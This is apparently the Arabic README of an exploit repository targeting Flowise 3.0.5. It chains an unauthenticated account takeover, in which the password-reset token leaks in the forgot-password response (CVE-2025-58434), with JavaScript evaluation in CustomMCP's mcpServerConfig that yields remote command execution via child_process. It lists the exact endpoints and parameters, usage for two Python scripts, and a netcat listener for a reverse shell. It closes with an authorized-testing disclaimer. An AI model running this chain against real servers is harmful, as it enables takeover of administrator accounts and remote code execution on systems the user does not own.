
سلسلة استغلال لـ Flowise 3.0.5: استيلاء غير مصادق عليه على الحساب عبر كشف رمز إعادة تعيين كلمة المرور (CVE-2025-58434) مقترنًا بتقييم JavaScript الخاص بـ CustomMCP لتنفيذ التعليمات البرمجية عن بُعد.
مشكلتان في Flowise 3.0.5، متسلسلتان:
POST /api/v1/account/forgot-password رمز tempToken الخاص بالمستخدم المستهدف
مباشرةً في استجابة JSON. قم بإدخاله في POST /api/v1/account/reset-password
لتعيين كلمة مرور معروفة لأي حساب، بما في ذلك أول مسؤول -> استيلاء كامل
غير مصادق عليه على الحساب.mcpServerConfig في CustomMCP.
باستخدام جلسة ومفتاح API الخاص بمساحة العمل (من الخطوة 1)،
يقوم POST /api/v1/node-load-method/customMCP مع loadMethod=listActions
بتقييم سلسلة mcpServerConfig كـ JavaScript في عملية Flowise،
مما يتيح تنفيذ أوامر عن بُعد عبر require('child_process').exec(). (مشكلة Flowise منفصلة
تُستخدم هنا فقط لتحويل الاستيلاء على الحساب إلى تنفيذ كود؛ لم يُخصص لها CVE وقت كتابة هذا التقرير.)CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - السلسلة الكاملة (استيلاء على الحساب -> مفتاح API -> قشرة عكسية عبر CustomMCP)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# جهّز `nc -lvnp <LPORT>` مسبقًا
flowise_customMCP_rce.py - ثغرة CustomMCP RCE فقط (تتطلب مفتاح API)python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'
لأغراض الاختبار الأمني المصرح به والتعليم فقط. شغّل هذا فقط ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها.
المؤلف: r3vpwnx